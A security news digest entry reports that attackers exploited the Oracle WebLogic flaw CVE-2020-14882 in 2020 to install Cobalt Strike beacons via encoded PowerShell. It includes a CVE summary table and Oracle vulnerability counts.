Security News > 2020 > November > Critical bug actively used to deploy Cobalt Strike on Oracle servers

Critical bug actively used to deploy Cobalt Strike on Oracle servers
2020-11-05 12:55

Threat actors are actively exploiting Oracle WebLogic servers unpatched against CVE-2020-14882 to deploy Cobalt Strike beacons which allow for persistent remote access to compromised devices.

Cobalt Strike is a legitimate penetration testing tool also used by threat actors in post-exploitation tasks and to deploy so-called beacons that enable them to gain persistent remote access.

The CVE-2020-14882 remote code execution flaw was patched by Oracle during last month's Critical Patch Update and it was used by attackers to scan for exposed WebLogic servers one week later.

Attackers are using a chain of base64-encoded Powershell scripts to download and install Cobalt Strike payloads on unpatched Oracle WebLogic servers.

Cybersecurity firm Spyse which operates an IT infrastructure search engine discovered over 3,300 exposed Oracle WebLogic servers potentially vulnerable to CVE-2020-14882 exploits.


News URL

https://www.bleepingcomputer.com/news/security/critical-bug-actively-used-to-deploy-cobalt-strike-on-oracle-servers/

Related Vulnerability

DATE CVE VULNERABILITY TITLE RISK
2020-10-21 CVE-2020-14882 Unspecified vulnerability in Oracle Weblogic Server
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console).
network
low complexity
oracle
critical
9.8

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Oracle 781 388 3148 2078 432 6046